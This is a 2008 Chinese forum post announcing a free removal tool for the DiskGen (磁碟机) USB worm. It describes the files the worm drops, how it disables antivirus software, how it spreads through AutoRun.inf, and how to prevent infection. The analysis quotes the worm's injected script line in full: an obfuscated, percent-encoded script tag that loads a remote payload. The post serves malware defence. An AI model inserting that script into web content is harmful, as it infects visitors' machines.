悠嘻猴 2008-7-31 13:19
磁碟机专杀
[size=10.5pt][/size]
[size=10.5pt][font=宋体]软件名称:磁碟机专杀 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]软件类别:专杀工具 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]软件版本: [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]软件大小:85.0K [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]应用平台:Win2003/WinXP/Win2000/NT/WinME/Win9X/ [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]更新时间:2008-03-27 18:03:09 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]授权方式:免费软件 [/font][/size][size=10.5pt][/size]
[size=10.5pt][/size]
[size=10.5pt][b][font=宋体]软件说明[/font][/b][/size][size=10.5pt][/size]
[size=10.5pt][/size]
[align=center][size=10.5pt][/size][/align]
[size=10.5pt][/size]
[size=12pt][b][font=宋体]病毒评估[/font][/b][/size][size=12pt][/size]
[size=10.5pt][/size]
[size=10.5pt][font=宋体]病毒名称: 磁碟机病毒 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]病毒名称英文:Worm.DiskGen [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]病毒类型:感染型 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]危险级别:★★★☆ [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]传播方式:U盘 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]受影响的系统: Windows 2000, Windows XP, Windows Server 2003 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]未受影响的系统:Windows 3.x, Macintosh, Unix, Linux [/font][/size][size=10.5pt][/size]
[size=12pt][b][font=宋体]病毒危害:[/font][/b][/size][size=12pt][/size]
[size=10.5pt][/size]
[size=10.5pt]1 [font=宋体]破坏本机杀毒软件运行,删除本机杀毒软件服务、驱动等。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]2 [font=宋体]感染本机 .exe, .htm, .html, .js, .rar, .zip文件。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]3 [font=宋体]释放DLL文件,注册COM组件,弹出广告,下载其他病毒、木马。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]4 [font=宋体]中毒后系统无法进入安全模式、组策略功能也被禁用。 [/font][/size][size=10.5pt][/size]
[size=12pt][b][font=宋体]传播形式:[/font][/b][/size][size=12pt][/size]
[size=10.5pt][/size]
[size=10.5pt]1 [font=宋体]病毒首先释放以下文件到X:\WINDOWS\system32\com文件夹下:[/font][/size][size=10.5pt][/size]
[size=10.5pt]lsass.exe , smss.exe, netcfg.dll, netcfg.000[/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]释放文件dnsq.dll到X:\WINDOWS\system32文件夹下。[/font][/size][size=10.5pt][/size]
[size=10.5pt][/size]
[size=10.5pt]2 [font=宋体]启动lsass.exe,smss.exe进程,感染文件。然后加载netcfg.dll,并全局注入dnsq.dll。[/font][/size][size=10.5pt][/size]
[size=10.5pt]3 dnsq.dll[font=宋体]文件负责监视杀毒软件及工具的运行,如果发现就将其关闭,关且它还监控病毒进程lsass.exe和smss.exe。[/font][/size][size=10.5pt][/size]
[size=10.5pt]4 [font=宋体]该病病毒会感染三种类型的文件: [/font][/size][size=10.5pt][/size]
[size=10.5pt]1[font=宋体])网页文件:.htm, .html, .js[/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]感染方法:在文件尾部追加字符串document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70'></sCrIpT>");或字符串<ScRiPt src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></sCrIpT>[/font][/size][size=10.5pt][/size]
[size=10.5pt]2[font=宋体])可执行程序:.exe[/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]被感染的exe文件有三个部分组成:[/font][/size][size=10.5pt][/size]
[size=10.5pt][/size]
[size=10.5pt]a[font=宋体])加了被感染程序图标的病毒体。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]b[font=宋体])被加密的原程序。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]c[font=宋体])加密的病毒体。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]3[font=宋体])压缩文件:.rar, .zip[/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]将压缩包内文件解压,并感染,再打包。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]5 [font=宋体]在每个磁盘分区的根目录下生成AutoRun.Inf、pagefile.pif和~.exe.*.exe文件,实现死灰复燃。在“开始”菜单的启动项中生成~.exe.*.exe文件,其中*为一串随机数字。[/font][/size][size=10.5pt][/size]
[size=10.5pt]6 [font=宋体]破坏安全模式、删除注册表中“显示隐藏文件属性”键值。[/font][/size][size=10.5pt][/size]
[size=12pt][b][font=宋体]清除病毒[/font][/b][/size][size=12pt][/size]
[size=10.5pt][/size]
[size=10.5pt][font=宋体]目前SanLen磁碟机病毒专杀共可清除十个磁碟机病毒变种,即:[/font][/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.ca [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.ci [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.ex [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.gfh [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.u [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.vin [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.vio [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.vip [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.viq [/size][size=10.5pt][/size]
[size=10.5pt]Worm.Win32.DiskGen.xx [/size][size=10.5pt][/size]
[size=12pt][b][font=宋体]预防和处理办法:[/font][/b][/size][size=12pt][/size]
[size=10.5pt][/size]
[size=10.5pt]1 [font=宋体]关闭U盘的“自动播放功能”。运行可执行程序时先进行杀毒。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]2 [font=宋体]及时升级系统漏洞。 [/font][/size][size=10.5pt][/size]
[size=10.5pt]3 [font=宋体]将病毒库升级到最新,并开启防病毒软件的实时监控。 [/font][/size][size=10.5pt][/size]
[size=10.5pt][font=宋体]下载地址:[url=http://www.sanlen.com/down/sl_down_161.htm]http://www.sanlen.com/down/sl_down_161.htm[/url][/font][/size]
[[i] 本帖最后由 悠嘻猴 于 2008-9-9 15:11 编辑 [/i]]